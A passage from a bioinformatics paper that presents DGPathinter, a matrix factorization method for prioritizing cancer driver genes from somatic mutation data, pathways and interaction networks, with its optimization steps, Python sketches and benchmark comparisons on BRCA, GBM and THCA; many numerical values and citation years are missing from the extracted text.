the matrix factorization-based methods factorize the data matrix as the multiplication of a low-rank sample matrix and a low-rank gene matrix (lee et al., ; sill et al., ; zhou et al., , ; xi & li, ; xi, li & wang, ), where the entries of the sample matrix indicate the assignments of different samples to different subsets and the entries of the gene matrix indicate the scores of the abnormal genes in the related subsets of samples. in our previous study (xi, li & wang, ), the matrix factorization framework has been shown to be an appropriate framework for the task of detecting driver genes from mutation data of heterogeneous cancers. here we denote the matrix G_{p×k} = (g_1, ..., g_k) as the gene matrix and the binary matrix S_{n×k} = (s_1, ..., s_k) as the sample matrix, and use their multiplication S G^T to approximate the mutation matrix X. the entries of G represent the mutation scores of the tested genes related to the sets of tumor samples indicated by the sample matrix S, whose entries represent the assignments of the tested samples to different sample sets. here the number k is the rank of the reconstruction matrix of the mutation matrix X. due to the constraint that the entries of matrix S are binary valued, we use a boolean constraint on matrix S (malioutov & malyutov, ), i.e., S ∘ (S − J) = 0, where the operator ∘ indicates the hadamard product of two matrices, and the matrix J denotes an n×k matrix with all entries being 1. the fitting problem of the multiplication of the two matrices S and G and the mutation matrix X can be formulated as X ≈ S G^T + ε, where ε is the residual matrix between the matrix X and the multiplication S G^T, and matrix S is subject to the equality restriction S ∘ (S − J) = 0.
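to make the data layout described above concrete, the following is a minimal sketch (not the authors' released implementation) of how the three inputs of the model — the binary mutation matrix X, the pathway–gene relationship matrix F and the graph laplacian L — could be assembled with numpy; the toy samples, genes, mutations, pathways and edges, and all variable names, are hypothetical.

```python
import numpy as np

# hypothetical toy inputs: tumor samples, tested genes, observed (sample, gene) mutations,
# curated pathways (gene sets) and an undirected gene interaction network (edge list)
samples = ["s1", "s2", "s3"]
genes = ["gA", "gB", "gC", "gD"]
mutations = [("s1", "gA"), ("s1", "gC"), ("s2", "gB"), ("s3", "gA"), ("s3", "gD")]
pathways = {"p1": {"gA", "gB"}, "p2": {"gB", "gC", "gD"}}
edges = [("gA", "gB"), ("gB", "gC"), ("gC", "gD")]

n, p, m = len(samples), len(genes), len(pathways)
s_idx = {s: i for i, s in enumerate(samples)}
g_idx = {g: j for j, g in enumerate(genes)}

# binary somatic mutation matrix X (n x p): entry 1 if the gene is mutated in the sample
X = np.zeros((n, p))
for s, g in mutations:
    X[s_idx[s], g_idx[g]] = 1.0

# pathway-gene relationship matrix F (m x p): F[i, j] = 1 if gene j belongs to pathway i
F = np.zeros((m, p))
for i, members in enumerate(pathways.values()):
    for g in members:
        F[i, g_idx[g]] = 1.0

# graph laplacian L = D - A of the gene interaction network (p x p)
A = np.zeros((p, p))
for u, v in edges:
    A[g_idx[u], g_idx[v]] = A[g_idx[v], g_idx[u]] = 1.0
L = np.diag(A.sum(axis=1)) - A
```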
by estimating the mutation scores of the tested genes in the matrix G from the information of somatic mutation data, pathways and the interaction network, we can identify the potential driver genes by ranking their mutation scores. the strategies for incorporating pathway and network information are presented below. to make the driver gene prioritization procedure in our model driven by prior knowledge from pathways, we introduce a non-negative matrix V_{m×k} as the pathway score matrix. the number of rows of the matrix, m, is the total number of pathways used in our model. the column vectors of the matrix V = (v_1, ..., v_k) represent the scores of the pathways, and a higher score of a pathway indicates a larger potential that the pathway is dysregulated in the related set of tumor samples. to incorporate pathway information into the gene scores for different sets of samples, we project the gene scores onto their related pathways and maximize the covariance between the projection scores and the pathway scores as \(R_C = -\sum_{j=1}^{k}\mathrm{cov}(F g_j, v_j) = -\mathrm{tr}\{G^T F^T V\}\) (chen & zhang, ), where the matrix V is subject to the inequality restriction V ≥ 0. here the matrix F_{m×p} represents the relationships between the tested genes and their related pathways. the entry f_{ij} equaling 1 denotes that the jth gene belongs to the ith pathway. in addition, to avoid an overfitting problem, we also use a frobenius norm-based regularization on the pathway scores V as \(R_V = \|V\|_F^2\) (pan et al., ). furthermore, to integrate interaction network information into our model, we utilize laplacian regularization to encourage smoothness between the scores of interacting genes (xie, wang & tao, ). the regularization term is formulated as \(R_L = \mathrm{tr}\{G^T L G\}\), where the matrix L = D − A is the laplacian matrix of the interaction network, the matrix A is the adjacency matrix, and the matrix D is its corresponding degree matrix. consequently, we estimate the mutation scores of the tested genes in the gene matrix G, the pathway score matrix V and the sample indicator matrix S by optimizing an objective function of a knowledge-driven model with integrated data fitting and regularization terms, formulated as:
\[
\min_{S,G,V}\; \|X - S G^T\|_F^2 - \lambda_C \,\mathrm{tr}\{G^T F^T V\} + \lambda_L \,\mathrm{tr}\{G^T L G\} + \lambda_V \,\|V\|_F^2 \quad \text{s.t. } S \circ (S - J) = 0,\; V \ge 0, \qquad (1)
\]
where \(\lambda_C\), \(\lambda_L\) and \(\lambda_V\) are used to balance the data fitting, the coherence between gene scores and pathway scores according to their relations, the smoothness between scores of interacting genes and the regularization term of pathway scores. the tuning parameters \(\lambda_C\), \(\lambda_V\) and \(\lambda_L\) are empirically set to . , . and . , respectively. we have also investigated the results of dgpathinter when the three parameters change. for the three parameters, we can see that the detection results of the top genes show little variance when the tuning parameters are changed (figs. s –s ), demonstrating the robustness of our model with respect to these parameters. in fig. 1, we illustrate an overview of dgpathinter through a schematic diagram.
optimization of knowledge-driven matrix factorization
due to the equivalence between the matrix multiplication S G^T and the summation of multiple rank-one layers \(\sum_{i=1}^{k} s_i g_i^T\), we incorporate a layer-by-layer procedure to solve the optimization problem iteratively (lee et al., ; sill et al., ; xi & li, ). note that the first layer is the best rank-one estimation of the data matrix.
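as an illustration only (not the released dgpathinter code), the objective of eq. (1) can be evaluated for candidate factors with a few lines of numpy; lam_c, lam_l and lam_v stand for the tuning parameters \(\lambda_C\), \(\lambda_L\) and \(\lambda_V\), and the function and variable names are assumptions.

```python
import numpy as np

def dgpathinter_objective(X, S, G, V, F, L, lam_c, lam_l, lam_v):
    """value of eq. (1): data fit - pathway coherence + network smoothness + pathway-score penalty.

    shapes: X (n x p), S (n x k, binary), G (p x k), V (m x k, nonnegative),
            F (m x p), L (p x p).
    """
    fit = np.linalg.norm(X - S @ G.T, "fro") ** 2      # ||X - S G^T||_F^2
    coherence = np.trace(G.T @ F.T @ V)                # tr{G^T F^T V}
    smoothness = np.trace(G.T @ L @ G)                 # tr{G^T L G}
    penalty = np.linalg.norm(V, "fro") ** 2            # ||V||_F^2
    return fit - lam_c * coherence + lam_l * smoothness + lam_v * penalty
```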
we estimate the first layer by minimizing the following objective function
\[
\min_{s_1,g_1,v_1}\; \|X - s_1 g_1^T\|_F^2 - \lambda_C \,\mathrm{tr}\{g_1^T F^T v_1\} + \lambda_L \,\mathrm{tr}\{g_1^T L g_1\} + \lambda_V \,\|v_1\|_F^2 \quad \text{s.t. } s_1 \circ (s_1 - \mathbf{1}_n) = 0,\; v_1 \ge 0, \qquad (2)
\]
where s_1, g_1 and v_1 are the first column vectors of the matrices S, G and V respectively, and \(\mathbf{1}_n\) indicates an n×1 vector with all coefficients being 1. the term \(v_1^T v_1\) is the inner product of the vector v_1, which is equivalent to the squared frobenius norm of the vector. we then apply an alternating strategy to estimate the three vectors s_1, g_1 and v_1 in eq. (2). when the other two vectors v_1 and s_1 are fixed, the minimization problem for the mutation score vector g_1 can be reformulated as below:
\[
\min_{g_1}\; \|s_1\|^2\, g_1^T g_1 - 2 (X^T s_1)^T g_1 - \lambda_C (F^T v_1)^T g_1 + \lambda_L\, g_1^T L g_1 . \qquad (3)
\]
through the karush–kuhn–tucker (kkt) conditions, the mutation score vector g_1 can be estimated as
\[
g_1 \leftarrow \left(\|s_1\|^2 I_p + \lambda_L L\right)^{-1}\left(X^T s_1 + \tfrac{\lambda_C}{2} F^T v_1\right), \qquad (4)
\]
where I_p is a p×p identity matrix. likewise, the optimization function to solve the pathway score vector v_1 in the optimization problem in eq. (2) is formulated as
\[
\min_{v_1}\; \lambda_V\, v_1^T v_1 - \lambda_C (F g_1)^T v_1 \quad \text{s.t. } v_1 \ge 0, \qquad (5)
\]
which is a non-negative quadratic programming problem. the estimation of the vector v_1 in eq. (5) can be calculated as:
\[
v_1 \leftarrow \left\{\tfrac{\lambda_C}{2\lambda_V} F g_1\right\}_+, \qquad (6)
\]
where {·}_+ is an operator which replaces the negative coefficients of the input vector with zeros. for the sample indicator vector s_1, the optimization function of eq. (2) is formulated as a boolean constrained problem
\[
\min_{s_1}\; \|g_1\|^2\, s_1^T s_1 - 2 (X g_1)^T s_1 \quad \text{s.t. } s_1 \circ (s_1 - \mathbf{1}_n) = 0 . \qquad (7)
\]
through the kkt conditions, the problem in eq. (7) can be solved as:
\[
s_1 \leftarrow I_{[1/2,\,+\infty)}\!\left( X g_1 \,/\, \|g_1\|^2 \right), \qquad (8)
\]
where \(I_{\Omega}(z)\) is an indicator function, of which the coefficients of the output vector are assigned to 1 when the corresponding coefficients of the input vector z belong to the set Ω, and 0 otherwise. consequently, the minimization function is optimized by alternately estimating the three vectors g_1, v_1 and s_1 in eqs. (4), (6) and (8) until convergence (pseudo-code in table 1). after convergence, the first rank-one layer s_1 g_1^T of the mutation matrix X, along with the related pathway score vector v_1, is obtained. since the cancer data may display heterogeneity, it is not sufficient to utilize only one layer to fit the mutation data matrix. subsequently, we apply the aforementioned one-layer estimation strategy on the remaining samples to obtain the next layer. when the mutation matrix is factorized iteratively until no sample remains, we can obtain the rank number k automatically (lee et al., ; sill et al., ; xi & li, ). the multiple-layer estimation yielded by our model can effectively incorporate information from the mutation matrix, the interaction network and pathways.
table 1 pseudo-code of the first rank-one layer estimation of dgpathinter.
algorithm dgpathinter: iterative estimation of the first rank-one layer
input: somatic mutation matrix X (n×p); pathway-by-gene bipartite matrix F (m×p); graph laplacian matrix of the interaction network L (p×p).
output: sample indicator vector s_1 (n×1); gene score vector g_1 (p×1); pathway score vector v_1 (m×1).
1: set \(\lambda_C\), \(\lambda_V\), \(\lambda_L\) to their empirical values and t ← 0; s_1^{(0)} ← 1_{n×1}, v_1^{(0)} ← 1_{m×1} and g_1^{(0)} ← (n I_p + \lambda_L L)^{-1} (X^T s_1^{(0)} + (\lambda_C/2) F^T v_1^{(0)})
2: repeat
3:   v_1^{(t+1)} ← {(\lambda_C / 2\lambda_V) F g_1^{(t)}}_+
4:   g_1^{(t+1)} ← (‖s_1^{(t)}‖^2 I_p + \lambda_L L)^{-1} (X^T s_1^{(t)} + (\lambda_C/2) F^T v_1^{(t+1)})
5:   s_1^{(t+1)} ← I_{[1/2,+∞)}( X g_1^{(t+1)} / ‖g_1^{(t+1)}‖^2 )
6:   t ← t + 1
7: until convergence
8: return v_1 ← v_1^{(t)}, g_1 ← g_1^{(t)} and s_1 ← s_1^{(t)}
notes: 1_{n×1} is an n×1 vector with all coefficients being 1; 1_{m×1} is an m×1 vector with all coefficients being 1.
experimental design and evaluation
for the driver gene prioritization of our approach, we select the maximum entry of each row of the gene matrix G as the score of a tested gene to be a potential driver gene, which represents the intensity of the mutation of the tested gene among different sets of tumor samples. we then prioritize the investigated genes according to their mutation scores and select the top ranked genes as potential driver genes.
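the alternating updates of eqs. (4), (6) and (8), the layer-by-layer scheme of table 1 and the row-maximum prioritization rule can be prototyped in a few dozen lines of numpy. the sketch below is an independent illustration under the reconstruction given above (including the assumed factors of 1/2), not the authors' released code; the function and variable names (estimate_rank_one_layer, dgpathinter_layers, lam_c, and so on) are hypothetical.

```python
import numpy as np

def estimate_rank_one_layer(X, F, L, lam_c, lam_l, lam_v, n_iter=100, tol=1e-6):
    """alternating updates of eqs. (4), (6) and (8) for one rank-one layer."""
    n, p = X.shape
    s1 = np.ones(n)                        # s1^(0): all samples assigned to the layer
    v1 = np.ones(F.shape[0])               # v1^(0): uniform pathway scores
    g1 = np.linalg.solve(n * np.eye(p) + lam_l * L,
                         X.T @ s1 + 0.5 * lam_c * F.T @ v1)
    for _ in range(n_iter):
        g1_old = g1
        v1 = np.maximum(lam_c / (2.0 * lam_v) * (F @ g1), 0.0)             # eq. (6)
        g1 = np.linalg.solve((s1 @ s1) * np.eye(p) + lam_l * L,
                             X.T @ s1 + 0.5 * lam_c * F.T @ v1)            # eq. (4)
        s1 = ((X @ g1) / (g1 @ g1) >= 0.5).astype(float)                   # eq. (8)
        if np.linalg.norm(g1 - g1_old) < tol * np.linalg.norm(g1_old):
            break
    return s1, g1, v1

def dgpathinter_layers(X, F, L, lam_c, lam_l, lam_v):
    """layer-by-layer factorization: peel off rank-one layers until no sample remains."""
    remaining = np.arange(X.shape[0])
    G_cols, V_cols = [], []
    while remaining.size > 0:
        s1, g1, v1 = estimate_rank_one_layer(X[remaining], F, L, lam_c, lam_l, lam_v)
        if s1.sum() == 0:                  # guard against an empty layer
            s1 = np.ones_like(s1)
        G_cols.append(g1)
        V_cols.append(v1)
        remaining = remaining[s1 == 0]     # uncovered samples go to the next layer
    G = np.column_stack(G_cols)            # p x k gene score matrix
    V = np.column_stack(V_cols)            # m x k pathway score matrix
    gene_scores = G.max(axis=1)            # prioritization: max score of each gene over layers
    return G, V, gene_scores
```

in this sketch the number of rank-one layers, and hence the rank k, emerges automatically from the loop, mirroring the layer-by-layer procedure described above.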
due to the lack of a generally accepted gold standard for driver genes, we further evaluate the detected genes via a list of known benchmarking cancer genes from a highly curated database, the network of cancer genes (ncg) (an et al., ). the ncg gene list contains both experimentally supported cancer genes from the cancer gene census (cgc) (futreal et al., ) and statistically inferred candidate genes from previous studies (an et al., ). the cancer specific genes from the two benchmarking gene lists are used to assess the prioritizing results of the investigated methods. by using these benchmarking genes as ground truth genes in the evaluation studies, we first compute the precisions and recalls under different rank thresholds and draw precision–recall curves of the competing methods, where a curve closer to the top and right indicates a better performance (wu, hajirasouliha & raphael, ; yang et al., ). the precision is calculated as the fraction of selected genes that are also benchmarking genes, and the recall is computed as the fraction of benchmarking genes that are selected by the rank threshold. next, we calculate the average rank of known genes in the prioritization results to comprehensively assess the prioritization performance, which is a traditional metric for evaluating the performance of retrieval (ma & zhang, ; gargi & kasturi, ; müller et al., ). furthermore, we select the top genes from the results of the competing methods, and compare the proportions of known driver genes detected by the competing methods. fisher’s exact test is also applied on the results, which can evaluate whether the selected genes are significantly enriched for known driver genes through the p values of the test. in addition, for the highly scored pathways given by our approach, we also investigate whether these pathways are correlated with cancer progressions.
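a minimal sketch of this evaluation protocol (precision–recall curve points, average rank of known genes, and fisher's exact test on the top of the ranking) is given below; it uses scipy.stats.fisher_exact and assumes a ranked gene list and a set of benchmark genes, with all names hypothetical.

```python
import numpy as np
from scipy.stats import fisher_exact

def precision_recall_points(ranked_genes, benchmark):
    """precision and recall at every rank threshold of a prioritized gene list."""
    hits = np.cumsum([g in benchmark for g in ranked_genes])
    k = np.arange(1, len(ranked_genes) + 1)
    return hits / k, hits / len(benchmark)

def average_rank(ranked_genes, benchmark):
    """mean position (1-based) of the benchmark genes that appear in the ranking."""
    ranks = [i + 1 for i, g in enumerate(ranked_genes) if g in benchmark]
    return float(np.mean(ranks)) if ranks else float("nan")

def top_k_enrichment(ranked_genes, benchmark, k=100):
    """fisher's exact test: are the top-k genes enriched for benchmark genes?"""
    top, rest = set(ranked_genes[:k]), set(ranked_genes[k:])
    table = [[len(top & benchmark), len(top - benchmark)],
             [len(rest & benchmark), len(rest - benchmark)]]
    odds_ratio, p_value = fisher_exact(table, alternative="greater")
    return len(top & benchmark), p_value
```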
results
driver gene identification
to evaluate the identification performance of dgpathinter, we compare our model with three existing methods, hotnet (leiserson et al., ), nbs (hofree et al., ) and muffinn (cho et al., ), on datasets of three types of cancers: brca, gbm and thca. in the performance evaluation, hotnet, nbs and muffinn are set to their default parameters. for muffinn, there are two versions (muffinn-dnmax and muffinn-dnsum) based on different strategies (cho et al., ), and we use both versions in the comparison study. the interactome information of all the investigated methods is the irefindex gene interaction network from razick, magklaras & donaldson ( ). the pathway information used in dgpathinter is from kegg, reactome and biocarta (ogata et al., ; joshi-tope et al., ; nishimura, ). in dgpathinter, the genes are ranked by their mutation scores from the matrix G. in the identification result of hotnet, a higher delta score of a gene indicates a larger potential of being a driver gene (details in supplemental information). for nbs, the genes are sorted according to their scores in the nbs profiles. in muffinn, the prediction scores of genes for muffinn-dnmax and muffinn-dnsum are used to prioritize the genes. to give a comprehensive view of the identification performance, we analyze all the investigated genes by precision–recall curves and average ranks of known driver genes over the prioritization results. for the top ranked genes, we further compare the fractions of known benchmarking genes among the results of these methods, and their related p values of fisher’s exact test. venn diagrams of the top ranked genes among the competing methods are also analyzed.
performance comparison
the overall performance of dgpathinter, hotnet, nbs, muffinn-dnmax and muffinn-dnsum is illustrated as precision–recall curves in fig. 2. when we use the known benchmarking cancer genes in ncg as a gold standard, the precision–recall curves of dgpathinter are clearly located above the other curves for all three types of cancers, indicating that dgpathinter yields the best identification performance among the competing results on the datasets of the three types of cancers. taking the brca result as an example, the precisions of dgpathinter, hotnet, nbs, muffinn-dnmax and muffinn-dnsum are . %, . %, . %, . % and . % respectively when the recalls of the results are fixed at . %. in the gbm results, the precisions of gbm-specific ncg genes are . % for hotnet, . % for nbs, . % for muffinn-dnmax and . % for muffinn-dnsum when the recalls are . %. in comparison, dgpathinter achieves a precision of . % in the same situation. for the known experimentally validated driver genes curated by cgc, we also draw the precision–recall curves of the investigated results for the cgc gene list. in consistency with the ncg results, a similar phenomenon can also be observed: the identification performance of our approach outperforms the results of the other competing methods (fig. s ). for example, dgpathinter gives a precision of . % on the brca data and . % on the gbm data when recalls are at . %, which are also higher than those of the other competing methods in the same situation. to assess whether and to which extent the difference between the performance of our method and previous approaches is statistically significant, we apply the non-parametric friedman test on the areas under the curve (aucs) of the precision–recall curves among the three investigated cancers (table s ). the aucs for known ncg and cgc genes yield p values of . and . , respectively, indicating that the difference between the performance of the investigated methods is statistically significant. we also evaluate the average rank of the known cancer genes predicted by the investigated methods. for the ncg gene list, dgpathinter yields an average rank of . for known breast cancer specific genes, which is smaller than those of . for hotnet, . for nbs, . for muffinn-dnmax, . for muffinn-dnsum and . for random selection (table 2).
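the non-parametric friedman test used in this section to compare the methods across the three cancers can be reproduced with scipy; the auc values below are placeholders rather than the paper's numbers, and the variable names are assumptions.

```python
from scipy.stats import friedmanchisquare

# hypothetical per-cancer aucs (brca, gbm, thca) for each competing method
aucs = {
    "dgpathinter":   [0.30, 0.28, 0.25],
    "hotnet":        [0.22, 0.20, 0.18],
    "nbs":           [0.21, 0.19, 0.17],
    "muffinn-dnmax": [0.20, 0.18, 0.16],
    "muffinn-dnsum": [0.19, 0.17, 0.15],
}
statistic, p_value = friedmanchisquare(*aucs.values())
print(f"friedman chi-square = {statistic:.3f}, p = {p_value:.4f}")
```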
this result demonstrates that the benchmarking cancer genes in the result of our approach are ranked much closer to the top on average, when compared with those of the other results. when we examine the cgc experimentally validated genes, our approach also yields the smallest average rank among the competing methods (table 2). the average ranks for the breast cancer specific cgc gene list are . , . , . , . , . and . for dgpathinter, hotnet, nbs, muffinn-dnmax, muffinn-dnsum and random selection, respectively. we also apply the non-parametric friedman test on the average ranks of known ncg and cgc genes in the detection results of the competing methods, yielding p values of . and . respectively. the aforementioned investigations suggest that dgpathinter shows a more promising capability for prioritizing known cancer genes than the other competing approaches.
figure 2 precision–recall curves of the prioritization results of the investigated methods for cancer specific known driver genes curated by ncg (an et al., ) on (a) brca, (b) gbm and (c) thca datasets, where blue, dark green, light green, dark red and violet lines represent the curves of dgpathinter, hotnet, nbs, muffinn-dnmax and muffinn-dnsum, respectively. different points on a same curve represent the precisions and recalls at different thresholds of the results.
table 2 the average ranks of cancer specific known driver genes that are prioritized by the competing methods on the brca, gbm and thca datasets. rows: dgpathinter, hotnet, nbs, muffinn-dnmax, muffinn-dnsum, random; columns: brca, gbm and thca for the ncg gene list (left part of table) and for the cgc gene list (right part of table). note: the evaluation cancer specific known driver genes are from ncg (an et al., ) (left part of table) and cgc (futreal et al., ) (right part of table).
evaluation of top ranked genes
for the top ranked genes, the top genes of the five prioritization results are selected for further evaluation. in the brca result, the top genes for hotnet, nbs, muffinn-dnmax and muffinn-dnsum include , , and genes in the ncg list respectively. in contrast, among the top genes for dgpathinter, there are genes matched in the ncg benchmarking genes (fig. 3). the p value of fisher’s exact test on the result of dgpathinter on brca is . – , indicating that the selected genes are significantly enriched for ncg genes. for the gbm results, dgpathinter, hotnet, nbs, muffinn-dnmax and muffinn-dnsum identify , , , and ncg genes, with related p values of . e- , . e- , . e- , . e- and . e- respectively. compared with the p values of the other identification results, dgpathinter yields the smallest p values among the competing results (fig. 3). these results demonstrate that dgpathinter performs the best among these methods in detecting ncg benchmarking cancer genes. furthermore, we investigate the numbers of selected top genes that are also cgc experimentally validated driver genes.
for the brca data, there are , and cgc driver genes detected by dgpathinter, hotnet and nbs, with p values of . e- , . e- and . e- respectively. for the gbm dataset, there are nine cgc genes captured by dgpathinter, of which the fisher’s exact test p value is . e- and is smaller than those of the other investigated methods (eight cgc genes for hotnet with a p value of . e- , six cgc genes for nbs with a p value of . e- and one cgc gene for both muffinn-dnmax and muffinn-dnsum with p values of . e- ). for the thca-specific driver genes detected by the competing methods, the ncg genes completely overlap the cgc genes, and it can be observed that dgpathinter achieves the best performance among the competing methods. when we apply the friedman test on the proportions of known ncg and cgc genes in the top genes detected by the competing methods on the investigated cancers, we obtain p values of . and . respectively. we further change the number of top-ranked genes considered to see how the changes affect the results of the statistical test. for the proportions of known ncg and cgc genes in the top genes of the results of the competing methods, the p values of the friedman test are . and . respectively; for the top genes, the p values are . for known ncg genes and . for known cgc genes. these results demonstrate that there is a statistically significant difference between the performance of the competing methods.
figure 3 bar plot of the numbers of known cancer specific driver genes that are selected in the top genes among the competing prioritization results, for (a) brca, (b) gbm and (c) thca respectively. the dark blue bars represent the number of cgc genes (futreal et al., ), and the light blue bars represent the number of statistically inferred candidate genes in ncg (including both cgc genes and statistically inferred genes) (an et al., ). the dark red text at the top of the dark blue bars indicates the p values of fisher’s exact test on the selected genes for cancer specific cgc genes, while the dark green text at the top of the light blue bars represents the p values for cancer-specific ncg genes.
furthermore, we compare the top genes among the five prioritization results and draw venn diagrams of their results for the three types of cancers respectively (fig. 4). for the brca dataset, genes identified by dgpathinter are also detected by at least one of the other results. for example, the gata gene is identified by dgpathinter, hotnet and nbs. as reported in a previous study (usary et al., ), variants in the gata gene may contribute to tumorigenesis in esr-positive breast cancers. another study also shows that gata mutations have the potential to be associated with aberrant nuclear localization, reduced transactivation and cell invasiveness in breast cancers (gaynor et al., ).
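the venn-style comparison of the top gene lists described here and in the next paragraphs amounts to simple set algebra over the prioritized lists; a short sketch, with hypothetical method outputs and truncated gene symbols as in the text, follows.

```python
# hypothetical top-gene sets returned by each competing method
top_genes = {
    "dgpathinter": {"tp", "pten", "egfr", "gata", "tert"},
    "hotnet":      {"tp", "pten", "egfr", "gata"},
    "nbs":         {"tp", "pten", "gata"},
}

others = [s for m, s in top_genes.items() if m != "dgpathinter"]

# genes detected by dgpathinter and by at least one other method
shared = {g for g in top_genes["dgpathinter"] if any(g in s for s in others)}

# genes unique to dgpathinter
unique = top_genes["dgpathinter"] - set().union(*others)

print("shared:", sorted(shared))
print("unique to dgpathinter:", sorted(unique))
```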
for the gbm dataset, there are in total genes shared in the detection results of dgpathinter, hotnet and nbs, including the cgc curated gbm specific driver genes tp , pten, pik r , egfr and pik ca (futreal et al., ), and the ncg inferred gbm specific driver candidates erbb and rb (an et al., ). for the thca dataset, hras is co-detected by dgpathinter, hotnet and nbs. although hras is not a thca specific driver gene curated by either cgc or ncg, it is reported as a driver gene for infrequent sarcomas and some other rare tumor types by cgc (futreal et al., ).
figure 4 venn diagrams of the top genes in the results of dgpathinter (blue circle), hotnet (dark green circle), nbs (light green circle), muffinn-dnmax (dark red circle) and muffinn-dnsum (violet circle) on (a) brca, (b) gbm and (c) thca datasets.
moreover, some genes detected by dgpathinter are also captured by muffinn-dnmax or muffinn-dnsum. taking the gbm results as an example, the mdm gene is shared by the results of dgpathinter, muffinn-dnmax and muffinn-dnsum, and is reported to be a driver gene in bladder cancer, glioblastoma and retinoblastoma by cgc (futreal et al., ). the kras gene is identified by dgpathinter, hotnet and muffinn-dnsum, and is also a driver gene in several types of cancers reported by cgc (futreal et al., ). the flt gene is included in the results of dgpathinter, nbs and muffinn-dnsum, and is curated as a driver gene of soft tissue sarcoma by cgc (futreal et al., ). in addition to the genes shared by dgpathinter and other methods, there are also some genes unique to the results of dgpathinter. for example, the tsh gene is a breast cancer driver gene curated by cgc, which is only detected by dgpathinter on the brca dataset. a number of cgc curated gbm specific driver genes, including akt , cdh , map k , ncor and tbx (futreal et al., ), are also unique to the results of dgpathinter on the gbm dataset. for the results of the thca dataset, the cgc-curated thca specific driver gene tert is only identified by dgpathinter but not by the other competing methods (futreal et al., ). the full lists of the top genes detected by dgpathinter on brca, gbm and thca, along with the methods that co-detect them, are shown in tables s –s , respectively.
pathway analysis
in addition to driver gene identification, dgpathinter can also provide highly scored pathways during the driver gene detection process. we further analyze the top scored pathways in the results of dgpathinter, and find some well-known cancer related pathways such as the p pathway, the pten pathway, the p mapk events pathway and the atm pathway (table 3). in the results of the brca dataset, the top one pathway is the gata pathway curated by the biocarta database, which is reported to be highly associated with breast cancer. for example, the gata pathway is reported to play an important role in reducing e-cadherin in breast cancer tissues (tu et al., ). meanwhile, the top ranked pathway in the gbm results is the rb pathway curated by biocarta, which is also found in the brca results. as reported by previous studies (chow et al., ; sherr & mccormick, ), a mutated rb pathway is one of the obligate events in the pathogenesis of glioblastomas.
especially, the thyroid cancer pathway is found in the results of dgpathinter on the thca dataset, and the glioma pathway is in the results on the gbm dataset. some other cancer-related pathways are also included in the lists of top ranked pathways, such as the gab signalosome pathway, the signaling to ras pathway, the mtor signaling pathway, the non-small cell lung cancer pathway, the melanoma pathway, the pancreatic cancer pathway, the prostate cancer pathway, the bladder cancer pathway and the endometrial cancer pathway.
table 3 top scored pathways in the results of dgpathinter on the somatic mutation datasets of brca, gbm and thca (columns: rank, brca, gbm, thca).
biocarta gata pathway biocarta rb pathway reactome shc mediated signalling biocarta rna pathway biocarta rna pathway reactome sos mediated signalling reactome gab signalosome biocarta arf pathway reactome p mapk events biocarta arf pathway biocarta tel pathway reactome grb events in egfr signaling biocarta trka pathway biocarta p pathway reactome signalling to p via rit and rin biocarta hcmv pathway biocarta ctcf pathway reactome shc related events biocarta rb pathway biocarta pml pathway biocarta vitcb pathway biocarta longevity pathway biocarta tid pathway reactome frs mediated activation biocarta ctcf pathway biocarta pten pathway reactome purine ribonucleoside monophosphate biosynthesis biocarta ach pathway reactome sema d induced cell migration and growth cone collapse biocarta il pathway biocarta gcr pathway biocarta p hypoxia pathway biocarta ace pathway biocarta gleevec pathway biocarta atrbrca pathway reactome tie signaling biocarta bcellsurvival pathway biocarta igf mtor pathway biocarta plateletapp pathway biocarta cdc rac pathway reactome gab signalosome reactome signalling to ras biocarta p pathway biocarta atm pathway kegg ether lipid metabolism biocarta il pathway biocarta g pathway kegg thyroid cancer biocarta rac pathway reactome sema d in semaphorin signaling biocarta ami pathway biocarta erk pathway biocarta g pathway reactome signalling to erks biocarta ctla pathway biocarta chemical pathway biocarta intrinsic pathway biocarta pten pathway kegg endometrial cancer kegg pentose phosphate pathway biocarta pml pathway biocarta mtor pathway reactome down stream signal transduction biocarta ngf pathway kegg bladder cancer reactome purine metabolism reactome tie signaling biocarta eif pathway biocarta bad pathway kegg non small cell lung cancer kegg glycerophospholipid metabolism biocarta atrbrca pathway kegg glioma kegg bladder cancer biocarta tel pathway kegg melanoma kegg tyrosine metabolism biocarta tid pathway kegg pancreatic cancer kegg alanine aspartate and glutamate metabolism biocarta igf mtor pathway kegg prostate cancer kegg mtor signaling pathway reactome cd dependent pi k akt signaling biocarta met pathway kegg endometrial cancer reactome further platelet releasate reactome pi k akt signalling reactome signaling by egfr
discussion
in this paper, we propose a knowledge-driven matrix factorization framework called dgpathinter to identify driver genes from mutation data with prior knowledge from interactome and pathways incorporated.
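the pathway scores behind a ranking such as table 3 come from the columns of the matrix v. the paper does not spell out how the per-layer scores are aggregated; one natural choice, mirroring the gene prioritization rule, is the maximum over layers, and the sketch below (with hypothetical names) uses that assumption.

```python
import numpy as np

def rank_pathways(V, pathway_names, top=30):
    """rank pathways by their maximum score over the k rank-one layers (columns of V).

    the max-over-layers aggregation is an assumption, not stated in the paper.
    """
    scores = V.max(axis=1)                          # best score of each pathway across layers
    order = np.argsort(scores)[::-1][:top]
    return [(pathway_names[i], float(scores[i])) for i in order]
```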
the knowledge of pathways is incorporated by maximizing the correlation between the pathway scores and the mutation scores of genes according to their relations (chen & zhang, ). meanwhile, the knowledge of the interactome is utilized by graph laplacian regularization with the gene interaction network. to integrate the information from pathways, interactome and mutation data, a matrix factorization framework is adopted, which can also help address the problem of tumor sample heterogeneity. when comparing dgpathinter with three existing methods on three tcga cancer mutation datasets (brca, gbm and thca), we observe that dgpathinter achieves better performance than the other competing methods on precision–recall curves. the average ranks of known driver genes prioritized by dgpathinter are also smaller than those of the other existing methods. the top ranked genes detected by dgpathinter are highly enriched for the known driver genes when analyzed by fisher’s exact test, and the p values for dgpathinter are also more significant than those of the other investigated methods. while some known driver genes are shared in the detection results of dgpathinter and the existing methods, dgpathinter also identifies some known driver genes that are not detected by the other investigated methods. in addition, most of the top ranked scored pathways in the results of dgpathinter are cancer progression-associated pathways. the promising performance of dgpathinter in the identification of driver genes may be due to three potential reasons. first, prior knowledge from pathways is important for understanding the roles of genes in tumors (parsons et al., ; cancer genome atlas research network, ; vaske et al., ), and incorporating information from pathways has the potential to improve the detection power for driver genes. second, since cooperatively dysregulated genes are correlated with cancer formation and progression (vandin, upfal & raphael, ; leiserson et al., ; hofree et al., ; cho et al., ), gene interaction network information from the interactome can help in determining the influence of somatic mutations between interacting genes. third, the sample heterogeneity issue, namely that driver genes may mutate in different samples, is reported as a confounding factor in driver gene identification (cancer genome atlas network, ), and the matrix factorization framework is capable of analyzing heterogeneous samples (lee et al., ; sill et al., ; xi & li, ). to investigate the individual contribution of network information or pathway information to 